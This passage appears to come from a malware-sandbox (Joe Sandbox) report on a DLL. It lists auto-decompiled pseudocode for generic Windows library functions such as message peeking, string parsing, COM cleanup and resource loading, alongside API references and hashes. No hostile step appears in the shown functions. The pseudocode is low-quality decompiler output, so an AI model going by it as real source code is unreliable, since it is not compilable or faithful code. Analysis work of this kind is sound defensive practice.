                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1001EBFF
                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1001EC16
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1001EC50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePeek$H_prolog3
                                                                                                            • String ID:
                                                                                                            • API String ID: 3998274959-0
                                                                                                            • Opcode ID: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
                                                                                                            • Instruction ID: 7a5ad787edd883707f1bdef7fe17baf98f592d1ae8ded73e135a3cc4ce0c4401
                                                                                                            • Opcode Fuzzy Hash: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
                                                                                                            • Instruction Fuzzy Hash: 98314B75A0068AEFDB20DFA4CD95EAE73E8FF04744F110919F652AA181D770EE818B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001338A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 20%
                                                                                                            			E1001338A(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x10045580; // 0x6a53a566
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E100235A2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E100235A2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E100234D2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E100233E3();
						} else {
							_t23 = E100233BA();
						}
						L17:
						return E1001FBB5(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}















                                                                                                            0x1001338a
                                                                                                            0x1001338a
                                                                                                            0x10013393
                                                                                                            0x1001339a
                                                                                                            0x100133a0
                                                                                                            0x100133a3
                                                                                                            0x100133a8
                                                                                                            0x100133ae
                                                                                                            0x100133af
                                                                                                            0x100133b2
                                                                                                            0x100133b7
                                                                                                            0x100133ca
                                                                                                            0x100133cb
                                                                                                            0x100133cd
                                                                                                            0x100133d3
                                                                                                            0x100133ee
                                                                                                            0x100133e3
                                                                                                            0x100133e9
                                                                                                            0x100133e9
                                                                                                            0x100133f3
                                                                                                            0x100133f7
                                                                                                            0x10013400
                                                                                                            0x10013400
                                                                                                            0x10013406
                                                                                                            0x1001340e
                                                                                                            0x1001340f
                                                                                                            0x10013410
                                                                                                            0x10013412
                                                                                                            0x10013412
                                                                                                            0x10013416
                                                                                                            0x100133bf
                                                                                                            0x100133bf
                                                                                                            0x00000000
                                                                                                            0x10013418
                                                                                                            0x1001341c
                                                                                                            0x10013424
                                                                                                            0x10013426
                                                                                                            0x10013427
                                                                                                            0x10013430
                                                                                                            0x10013429
                                                                                                            0x10013429
                                                                                                            0x10013429
                                                                                                            0x10013438
                                                                                                            0x10013444
                                                                                                            0x10013444
                                                                                                            0x10013416
                                                                                                            0x100133bb
                                                                                                            0x100133bd
                                                                                                            0x100133bd
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?), ref: 100133E1
                                                                                                              • Part of subcall function 100235A2: __ismbcspace_l.LIBCMT ref: 100235A8
                                                                                                            • CharNextA.USER32(00000000), ref: 100133FE
                                                                                                            • _strtol.LIBCMT ref: 10013429
                                                                                                            • _strtoul.LIBCMT ref: 10013430
                                                                                                              • Part of subcall function 100233E3: strtoxl.LIBCMT ref: 10023403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                            • String ID:
                                                                                                            • API String ID: 4211061542-0
                                                                                                            • Opcode ID: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
                                                                                                            • Instruction ID: f08684c254250480d72764a4ddbea2980768ff31fde62085fc420af539802239
                                                                                                            • Opcode Fuzzy Hash: b933aa68570d5efca8f4eaeddd04aa25fc78684fad11b50231455a1c50543120
                                                                                                            • Instruction Fuzzy Hash: 132124725002959BCB11DB758C81BAAB7E8EF49240F9180A6F991DB041DB70EE848B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001829A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1001829A(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E10018237( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}









                                                                                                            0x1001829e
                                                                                                            0x100182a3
                                                                                                            0x10018347
                                                                                                            0x10018347
                                                                                                            0x100182aa
                                                                                                            0x100182b2
                                                                                                            0x100182c6
                                                                                                            0x100182c9
                                                                                                            0x1001831f
                                                                                                            0x10018325
                                                                                                            0x10018325
                                                                                                            0x10018328
                                                                                                            0x1001832d
                                                                                                            0x1001833e
                                                                                                            0x1001833e
                                                                                                            0x00000000
                                                                                                            0x10018344
                                                                                                            0x100182cb
                                                                                                            0x100182cc
                                                                                                            0x1001830f
                                                                                                            0x1001830f
                                                                                                            0x10018313
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018318
                                                                                                            0x00000000
                                                                                                            0x10018318
                                                                                                            0x100182ce
                                                                                                            0x100182d1
                                                                                                            0x10018307
                                                                                                            0x00000000
                                                                                                            0x10018307
                                                                                                            0x100182d3
                                                                                                            0x100182d4
                                                                                                            0x00000000
                                                                                                            0x100182d6
                                                                                                            0x100182d6
                                                                                                            0x100182d9
                                                                                                            0x100182e1
                                                                                                            0x100182e6
                                                                                                            0x100182eb
                                                                                                            0x100182f4
                                                                                                            0x100182f7
                                                                                                            0x100182fc
                                                                                                            0x10018301
                                                                                                            0x10018301
                                                                                                            0x100182fc
                                                                                                            0x100182eb
                                                                                                            0x00000000
                                                                                                            0x100182d9
                                                                                                            0x100182d4
                                                                                                            0x100182b4
                                                                                                            0x100182b8
                                                                                                            0x00000000
                                                                                                            0x100182ba
                                                                                                            0x100182bb
                                                                                                            0x00000000
                                                                                                            0x100182bb

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
                                                                                                            • Instruction ID: c02b11928bb34d0169e99c27a309c5edd31e5ee767437d52a490cee524480b39
                                                                                                            • Opcode Fuzzy Hash: b31dccd7f9cb35152b1adbebed6cf7bc24a86210e943a6289183959b2d91724e
                                                                                                            • Instruction Fuzzy Hash: 831149306006169FDB95DF65D888BAE77E9EF05A82B594428F866DE190CB35DF80CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016E59 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10016E59(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E1001FBC4(E100341C0, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038988;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E1000EC55(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E10010284(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E1000E519();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x10038068;
						E100102E5(_t64 - 0x1c);
						return E1001FC9C(_t55);
					}
					_push(_t60);
					E10015A21( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E1000E519();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}











                                                                                                            0x10016e59
                                                                                                            0x10016e59
                                                                                                            0x10016e60
                                                                                                            0x10016e65
                                                                                                            0x10016e67
                                                                                                            0x10016e6a
                                                                                                            0x10016e71
                                                                                                            0x10016e7a
                                                                                                            0x10016e7d
                                                                                                            0x10016e80
                                                                                                            0x10016e88
                                                                                                            0x10016e8c
                                                                                                            0x10016eca
                                                                                                            0x10016ed2
                                                                                                            0x10016edb
                                                                                                            0x10016ef0
                                                                                                            0x10016efe
                                                                                                            0x10016f04
                                                                                                            0x10016f06
                                                                                                            0x10016f09
                                                                                                            0x10016e91
                                                                                                            0x10016e95
                                                                                                            0x10016e9b
                                                                                                            0x10016e9e
                                                                                                            0x10016ea0
                                                                                                            0x10016ea2
                                                                                                            0x10016ea5
                                                                                                            0x10016ea6
                                                                                                            0x10016ea6
                                                                                                            0x10016eab
                                                                                                            0x10016ead
                                                                                                            0x10016ead
                                                                                                            0x10016eb4
                                                                                                            0x10016ebb
                                                                                                            0x10016ec7
                                                                                                            0x10016ec7
                                                                                                            0x10016f14
                                                                                                            0x10016f15
                                                                                                            0x10016f1a
                                                                                                            0x10016f1d
                                                                                                            0x10016f20
                                                                                                            0x10016f22
                                                                                                            0x10016f25
                                                                                                            0x10016f26
                                                                                                            0x10016f26
                                                                                                            0x00000000
                                                                                                            0x10016f20
                                                                                                            0x10016e8e
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prolog3Intersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2161412305-0
                                                                                                            • Opcode ID: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
                                                                                                            • Instruction ID: 9e2c62e01a377e36abd0cffc80b86d38f34e6c8c4516d003d55709a082953a26
                                                                                                            • Opcode Fuzzy Hash: 0700806b7c13f1ef32b0ea97c55ef510e32d0f48ea86653352f17d37f4c7f97a
                                                                                                            • Instruction Fuzzy Hash: BA21027690024AEFDF02DFA4CC809AEBBB8FF08201F00855AF555AB112DB75EA45DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100050DA Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E100050DA(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1001FBC4(E10032EBF, __ebx, __edi, __esi);
				_t35 = E10004D4A(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E100050A8(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E100209E8( &_a4, 0x1003e34c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10004EB7(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}
















                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050da
                                                                                                            0x100050e1
                                                                                                            0x100050ee
                                                                                                            0x100050f0
                                                                                                            0x100050f3
                                                                                                            0x100050f7
                                                                                                            0x100050fa
                                                                                                            0x100050fc
                                                                                                            0x100050fc
                                                                                                            0x10005101
                                                                                                            0x10005104
                                                                                                            0x10005108
                                                                                                            0x1000510b
                                                                                                            0x10005117
                                                                                                            0x1000511c
                                                                                                            0x1000511e
                                                                                                            0x10005120
                                                                                                            0x10005123
                                                                                                            0x10005128
                                                                                                            0x1000512a
                                                                                                            0x1000512a
                                                                                                            0x10005148
                                                                                                            0x1000515e
                                                                                                            0x10005169
                                                                                                            0x10005171
                                                                                                            0x10005171
                                                                                                            0x1000514a
                                                                                                            0x1000514d
                                                                                                            0x1000514f
                                                                                                            0x1000514f
                                                                                                            0x10005174

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100050E1
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10005117
                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,1000103F,00000000,00000000,?,?,?,1003E34C,00000004,1000103F,8007000E,100010E9), ref: 10005140
                                                                                                              • Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7
                                                                                                            • LocalFree.KERNEL32(1000103F,1000103F,8007000E,100010E9), ref: 10005169
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 1615547351-0
                                                                                                            • Opcode ID: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
                                                                                                            • Instruction ID: 9a825a0554ffdf54c91d77e2f252a4914c60dad5953363715cdae4c7005f82be
                                                                                                            • Opcode Fuzzy Hash: 43583110e56df0e81e8a923eb45825900272cf618558ac87eaf74387880b7d98
                                                                                                            • Instruction Fuzzy Hash: E0117071604249BFEB01DFA4CC81AAF7BA9FF08391F118529F629CB291D7329E50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10007DCD Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10007DCD(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000EC09(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}
















                                                                                                            0x10007dd0
                                                                                                            0x10007dd1
                                                                                                            0x10007dd4
                                                                                                            0x10007dd6
                                                                                                            0x10007ddd
                                                                                                            0x10007de0
                                                                                                            0x10007de3
                                                                                                            0x10007dea
                                                                                                            0x10007e01
                                                                                                            0x10007e01
                                                                                                            0x10007e08
                                                                                                            0x10007e13
                                                                                                            0x10007e13
                                                                                                            0x10007e17
                                                                                                            0x10007e1a
                                                                                                            0x10007e22
                                                                                                            0x10007e24
                                                                                                            0x10007e33
                                                                                                            0x10007e37
                                                                                                            0x10007e26
                                                                                                            0x10007e26
                                                                                                            0x10007e29
                                                                                                            0x10007e2d
                                                                                                            0x10007e2d
                                                                                                            0x10007e40
                                                                                                            0x10007e4c
                                                                                                            0x10007e4c
                                                                                                            0x10007e40
                                                                                                            0x10007e52
                                                                                                            0x10007e57
                                                                                                            0x10007e57
                                                                                                            0x10007e63

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 10007DF3
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10007DFB
                                                                                                            • LockResource.KERNEL32(00000000), ref: 10007E0D
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 10007E57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
                                                                                                            • Instruction ID: 3dc56c73a436512b808f722c38b75c0ae418026c2f8f50a1f0547d44829b82b9
                                                                                                            • Opcode Fuzzy Hash: 96f8b045b6aa7b5d69994283043e0196d0356fc4f28d5547994321b347e98763
                                                                                                            • Instruction Fuzzy Hash: B3119D70902B95EFE710DF61CC88AABB3B8FF08395B218499E84653555E3B8AD40D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10006279 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10006279(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E1001FBC4(E10032FC2, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E10006D2B(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x1003701c;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
